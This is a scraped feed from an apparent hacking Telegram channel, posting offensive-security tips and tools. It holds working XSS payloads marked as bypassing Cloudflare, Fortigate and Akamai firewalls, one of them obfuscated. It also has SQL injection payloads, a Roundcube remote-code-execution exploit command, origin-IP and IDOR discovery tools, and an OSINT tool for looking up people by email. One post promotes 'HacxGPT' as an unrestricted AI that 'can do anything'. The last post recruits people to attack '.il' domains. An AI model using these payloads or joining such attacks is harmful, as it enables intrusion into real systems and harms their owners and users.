BugCod3
7.27K subscribers
333 photos
6 videos
7 files
443 links
[ BugCod3 ] β€” From Shadows To Shells ⚑️

πŸ•Ά Hacking | 🐞 Bug Bounty | πŸ” Security Tools
βš”οΈ Learn β€’ Hunt β€’ Dominate

πŸ‘₯ Group: T.me/BugCod3GP
πŸ“‚ Topic: T.me/BugCod3Topic

🌐 Web: BugCod3.com
πŸ€– Contact: T.me/BugCod3BOT
πŸ“§ Email: BugCod3@protonmail.com
Download Telegram
XSS Payload Bypassing Cloudflare WAF on Next.js 14.1.4

Payload: β€˜>alert(154)</script><script/154=’;;;;;;;

#XSS #Bypass
βž–βž–βž–βž–βž–βž–βž–βž–βž–βž–
πŸ‘€ T.me/BugCod3BOT
πŸ“£ T.me/BugCod3
πŸ”₯7❀4⚑3
Fortinet Fortigate XSS Bypass

Payload: <dETAILS%0aopen%0aonToGgle%0a=%0aa=prompt,a()%20x>

#XSS #Bypass
βž–βž–βž–βž–βž–βž–βž–βž–βž–βž–
πŸ‘€ T.me/BugCod3BOT
πŸ“£ T.me/BugCod3
πŸ‘7πŸ”₯4❀3⚑3
πŸ¦… Blackbird πŸ¦…

πŸ’¬
Blackbird is a robust OSINT tool that facilitates rapid searches for user accounts by username or email across a wide array of platforms, enhancing digital investigations. It features WhatsMyName integration, export options in PDF, CSV, and HTTP response formats, and customizable search filters.

πŸ”Ό Installation:
cd blackbird
pip install -r requirements.txt


πŸ’» Usage:
Search by username πŸ‘€
python blackbird.py --username username1 username2 username3

Search by email 🌐
python blackbird.py --email email1@email.com email2@email.com email3@email.com

Export results to PDF πŸ“‚
python blackbird.py --email email1@email.com --pdf

✨ AI:
Blackbird uses AI-powered NER models to improve metadata extraction, identifying key entities for faster and more accurate insights.
python blackbird.py --username username1 --ai

😸 Github

⬇️ Download
πŸ”’ BugCod3

#Python #Osint #Tools
βž–βž–βž–βž–βž–βž–βž–βž–βž–βž–
πŸ‘€ T.me/BugCod3BOT
πŸ“£ T.me/BugCod3
Please open Telegram to view this post
VIEW IN TELEGRAM
❀8πŸ‘4πŸ”₯3⚑2
javascript How to extract urls,srcs and hrefs from all HTML elements in any website? Open DevTools and run
urls = []
$$('*').forEach(element => {
urls.push(element.src)
urls.push(element.href)
urls.push(element.url)
}); console.log(...new Set(urls))


#js #extract #urls
βž–βž–βž–βž–βž–βž–βž–βž–βž–βž–
πŸ‘€ T.me/BugCod3BOT
πŸ“£ T.me/BugCod3
Please open Telegram to view this post
VIEW IN TELEGRAM
❀5⚑3πŸ‘3πŸ”₯3❀‍πŸ”₯2
β”Œβ”€β”€(BugCod3γ‰Ώkali)-[~]
└─$ sudo rm -rf *2024

β”Œβ”€β”€(BugCod3γ‰Ώkali)-[~]
└─$ sudo mkdir 2025


#Notification #NewYear
βž–βž–βž–βž–βž–βž–βž–βž–βž–βž–
πŸ‘€ T.me/BugCod3BOT
πŸ“£ T.me/BugCod3
Please open Telegram to view this post
VIEW IN TELEGRAM
πŸŽ‰12πŸ”₯5🍾3🀝1
CVE-2024-55591

A Fortinet FortiOS Authentication Bypass Vulnerable Behaviour Detection

πŸ’¬
Description:
This script attempts to create a WebSocket connection at a random URI from a pre-authenticated perspective to the FortiOS management interface, and reviews the response to determine if the instance is vulnerable

Affected Versions:
βšͺ️ FortiOS 7.0.0 through 7.0.16
βšͺ️ FortiProxy 7.0.0 through 7.0.19
βšͺ️ FortiProxy 7.2.0 through 7.2.12

😸 Github

⬇️ Download
πŸ”’ BugCod3

#Python #CVE #Vulnerable #Detection
βž–βž–βž–βž–βž–βž–βž–βž–βž–βž–
πŸ‘€ T.me/BugCod3BOT
πŸ“£ T.me/BugCod3
Please open Telegram to view this post
VIEW IN TELEGRAM
πŸ‘4❀3πŸ”₯3⚑2πŸ‘Ž1
HExHTTP

πŸ’¬
HExHTTP is a tool designed to perform tests on HTTP headers and analyze the results to identify vulnerabilities and interesting behaviors.

πŸ“Š Features:
βšͺ️ Server Error response checking
βšͺ️ Localhost header response analysis
βšͺ️ Vhosts checking
βšͺ️ Methods response analysis
βšͺ️ HTTP Version analysis [Experimental]
βšͺ️ Cache Poisoning DoS (CPDoS) techniques
βšͺ️ Web cache poisoning
βšͺ️ Range poisoning/error (416 response error) [Experimental]
βšͺ️ Cookie Reflection
βšͺ️ CDN/proxies Analysis (Envoy/Apache/Akamai/Nginx) [IP]

πŸ”Ό Installation:
pip install -r requirements.txt
./hexhttp.py -u 'https://target.tld/'
# OR
python3 hexhttp.py -u 'https://target.tld/'


πŸ’» Usage:
./hexhttp.py -h
# Usage: hexhttp.py [-h] [-u URL] [-f URL_FILE] [-H CUSTOM_HEADER] [-A USER_AGENT] [-F] [-a AUTH] [-b]


😸 Github

⬇️ Download
πŸ”’ BugCod3

#Python #HTTP #Headers #Analyze
βž–βž–βž–βž–βž–βž–βž–βž–βž–βž–
πŸ‘€ T.me/BugCod3BOT
πŸ“£ T.me/BugCod3
Please open Telegram to view this post
VIEW IN TELEGRAM
❀4πŸ”₯3⚑2πŸ‘2🍾1
IDOR-Forge

IDOR Forge is an advanced and versatile tool designed to detect Insecure Direct Object Reference (IDOR) vulnerabilities in web applications.

πŸ’¬ Description:
IDOR Forge is a powerful and versatile tool designed to detect Insecure Direct Object Reference (IDOR) vulnerabilities in web applications. IDOR vulnerabilities occur when an application exposes direct references to internal objects (e.g., database keys, file paths) without proper authorization checks, allowing attackers to access unauthorized data. This tool automates the process of identifying such vulnerabilities by dynamically generating and testing payloads, analyzing responses, and reporting potential issues.

πŸ“Š Features:
βšͺ️ Dynamic Payload Generation
βšͺ️ Multi-Parameter Scanning
βšͺ️ Support for Multiple HTTP Methods
βšͺ️ Concurrent Scanning
βšͺ️ Rate Limiting Detection
βšͺ️ Customizable Test Values
βšͺ️ Sensitive Data Detection
βšͺ️ Proxy Support
βšͺ️ Interactive GUI Mode
βšͺ️ Verbose Mode
βšͺ️ Output Options
βšͺ️ Custom Headers
βšͺ️ Session Handling

πŸ”Ό Installation:
pip install -r requirements.txt
python IDOR-Forge.py


πŸ’» Usage:
# CLI Basic Usage

python IDOR-Forge.py -u "https://example.com/api/resource?id=1"

# Advanced Usage

python IDOR-Forge.py -u "https://example.com/api/resource?id=1" -p -m GET --proxy "http://127.0.0.1:8080" -v -o results.csv --output-format csv

python IDOR-Forge.py -u http://example.com/resource?id=1 -p -m GET --output results.csv --output-format csv --test-values [100,200,300] --sensitive-keywords ["password", "email"]


πŸ–Ό Interactive GUI Mode:
python idor_hunter.py --interactive


😸 Github

⬇️ Download
πŸ”’ BugCod3

#Python #Idor #Vulnerability #Tools
βž–βž–βž–βž–βž–βž–βž–βž–βž–βž–
πŸ‘€ T.me/BugCod3BOT
πŸ“£ T.me/BugCod3
Please open Telegram to view this post
VIEW IN TELEGRAM
❀7πŸ‘4πŸ”₯3⚑2
🎯 Directory-Traversal-Payloads 🎯

List of Directory Traversal/LFI Payloads Scraped from the Internet

😸 Github

⬇️ Download
πŸ”’ BugCod3

#Payload #Directory
βž–βž–βž–βž–βž–βž–βž–βž–βž–βž–
πŸ‘€ T.me/BugCod3BOT
πŸ“£ T.me/BugCod3
Please open Telegram to view this post
VIEW IN TELEGRAM
πŸ”₯9❀6⚑2πŸ‘2
WordPress A/B Image Optimizer 3.3 Plugin Arbitrary File Download Vulnerability

πŸ“Š Category: web applications

πŸ’» Platform: php

πŸͺ– Risk: Security Risk High 🚨

πŸ’¬
WordPress Plugin A/B Image Optimizer plugin versions 3.3 and below suffers from an arbitrary file download vulnerability.

πŸ”₯ CVE: CVE-2025-25163

⬇️ Download
πŸ”’ BugCod3

#CVE #Exploit #PHP #WordPress
βž–βž–βž–βž–βž–βž–βž–βž–βž–βž–
πŸ‘€ T.me/BugCod3BOT
πŸ“£ T.me/BugCod3
Please open Telegram to view this post
VIEW IN TELEGRAM
⚑5❀4πŸ‘3πŸ”₯3
Happy Nowruz to all the world πŸ€™πŸ“Ώ
πŸ”₯7❀2⚑1πŸ‘1
Extracts URLs from OSINT Archives for Security Insights.

πŸ’¬
Urx is a command-line tool designed for collecting URLs from OSINT archives, such as the Wayback Machine and Common Crawl.

πŸ“Š Features:
βšͺ️ Fetch URLs from multiple sources (Wayback Machine, Common Crawl, OTX)
βšͺ️ Process multiple domains concurrently
βšͺ️ Filter results by file extensions or patterns
βšͺ️ Use presets (predefined filter sets) for convenience (like "no-image" to exclude all image-related extensions)
βšͺ️ Multiple output formats (plain, JSON, CSV)
βšͺ️ Output to console or file
βšͺ️ Support for reading domains from stdin (pipeline integration)
βšͺ️ URL testing capabilities (status checking, link extraction)

πŸ”Ό Installation:
cd urx
cargo build --release


πŸ’» Usage:
# Scan a single domain
urx example.com

# Scan multiple domains
urx example.com example.org

# Scan domains from a file
cat domains.txt | urx


Github

⬇️ Download
πŸ”’ BugCod3

#Osint #URL #Tools
βž–βž–βž–βž–βž–βž–βž–βž–βž–βž–
πŸ‘€ T.me/BugCod3BOT
πŸ“£ T.me/BugCod3
❀10πŸ‘5πŸ”₯2⚑1
CF-Hero

πŸ’¬
CF-Hero is a comprehensive reconnaissance tool developed to discover the real IP addresses of web applications protected by Cloudflare. It performs multi-source intelligence gathering through various methods.

πŸ“Š Feautures:

βšͺ️ DNS Reconnaissance
βšͺ️ Third-party Intelligence
βšͺ️ Advanced Features

πŸ”Ό Installation:
go install -v github.com/musana/cf-hero/cmd/cf-hero@latest


πŸ’» Usage:
# The most basic running command. It checks A and TXT records by default.
cat domains.txt | cf-hero

# or you can pass "f" parameter to it.
cf-hero -f domains.txt

# Use the censys parameter to include Shodan in the scan
cat domain.txt | cf-hero -censys

# Use the shodan parameter to include Shodan in the scan
cat domain.txt | cf-hero -shodan

# Use the securitytrails parameter to include Shodan in the scan
cat domain.txt | cf-hero -securitytrails


Github

⬇️ Download
πŸ”’ BugCod3

#GO #Origin #IP #Tools
βž–βž–βž–βž–βž–βž–βž–βž–βž–βž–
πŸ‘€ T.me/BugCod3BOT
πŸ“£ T.me/BugCod3
❀7⚑3πŸ‘2πŸ”₯2
Blind SQL Injection

Tips:
1. Gather all urls from gau/waybackurls and Google Dorking.
2. Inject SQLi payload in all parameters one by one.
3. Analyze the response.

Payload used:
0'XOR(if(now()=sysdate(),sleep(10),0)) XOR'Z

#BugBounty #Payload #SQLi
βž–βž–βž–βž–βž–βž–βž–βž–βž–βž–
πŸ‘€ T.me/BugCod3BOT
πŸ“£ T.me/BugCod3
❀7πŸ”₯4⚑2
Useful Wireshark Filters

#WireShark #Tips
βž–βž–βž–βž–βž–βž–βž–βž–βž–βž–
πŸ‘€ T.me/BugCod3BOT
πŸ“£ T.me/BugCod3
πŸ”₯5⚑2❀2
SQL injection ID parameter

?id=1' order by 1 --+
?id=1' and "a"="a"--+
?id=1' and database()="securtiy"--+
?id=1' and substring(database(),1,1)="a"--+
?id=1' and sleep(2) and "a"="a"--+
?id=1' and sleep(2) and substring(database(),1,1)="a"--+

#SQL #Injection #Tips
βž–βž–βž–βž–βž–βž–βž–βž–βž–βž–
πŸ‘€ T.me/BugCod3BOT
πŸ“£ T.me/BugCod3
πŸ”₯5❀3⚑1
This media is not supported in your browser
VIEW IN TELEGRAM
How to use Gobuster to brute-force directories!

$ gobuster dir -u <target-URL> -w <wordlist>

dir: Directory scanning
-u: Target URL
-w: Path to wordlist file

⬇️ Download

#GoBuster #Tips #Tools
βž–βž–βž–βž–βž–βž–βž–βž–βž–βž–
πŸ“£ T.me/BugCod3
πŸ“£ T.me/Exploit_Forge
πŸ”₯4❀3⚑1
WAF bypass for Akamai and Cloudflare

Payload:
<address onscrollsnapchange=window['ev'+'a'+(['l','b','c'][0])](window['a'+'to'+(['b','c','d'][0])]('YWxlcnQob3JpZ2luKQ==')); style=overflow-y:hidden;scroll-snap-type:x><div style=scroll-snap-align:center>1337</div></address>



#WAF #Akamai #Cloudflare
βž–βž–βž–βž–βž–βž–βž–βž–βž–βž–
πŸ‘€ T.me/BugCod3BOT
πŸ“£ T.me/BugCod3
1❀4⚑2πŸ”₯2
HacxGPT

The cutting-edge AI developed by BlackTechX, inspired by WormGPT, designed to push the boundaries of natural language processing.

🎯 Features:

βšͺ️ Powerful AI Conversations: all questions will be answered in goodflow.
βšͺ️ Broken AI: Can do anything you want !!

βš™οΈ Installation:
sudo apt-get update; apt-get upgrade -y
sudo apt-get install git wget python3 -y
cd Hacx-GPT
pip install -r requirements.txt
python3 main.py


Github

⬇️ Download
πŸ”’ BugCod3

#Ai #Hackers #Tools
βž–βž–βž–βž–βž–βž–βž–βž–βž–βž–
πŸ‘€ T.me/BugCod3BOT
πŸ“£ T.me/BugCod3
❀4πŸ”₯3⚑2
CVE-2025-49113 - Roundcube Remote Code Execution

A proof-of-concept exploit for CVE-2025-49113, a remote code execution vulnerability in Roundcube Webmail.

πŸ’¬ Description:
This exploit targets a deserialization vulnerability in Roundcube Webmail versions 1.5.0 through 1.6.10. The vulnerability allows an authenticated attacker to execute arbitrary code on the server.

πŸ΄β€β˜ οΈ Vulnerable Versions:
βšͺ️ 1.5.0 - 1.5.9
βšͺ️ 1.6.0 - 1.6.10

πŸ–‡ Requirements:
βšͺ️ PHP 7.0 or higher
βšͺ️ cURL extension enabled
βšͺ️ Target running a vulnerable version of Roundcube

πŸ’» Usage:
php CVE-2025-49113.php <url> <username> <password> <command>


πŸ”Ό Example:
php CVE-2025-49113.php http://localhost/roundcube/ admin password "id"


Github

⬇️ Download
πŸ”’ BugCod3

#CVE #PHP #RemoteCode
βž–βž–βž–βž–βž–βž–βž–βž–βž–βž–
πŸ‘€ T.me/BugCod3BOT
πŸ“£ T.me/BugCod3
⚑4❀3πŸ”₯3
Hi πŸ‘‹ , friends who want to help us in attacking the .il domain address can provide their type of help in the bot below and contact us.

T.me/BugCod3BOT
5πŸ”₯8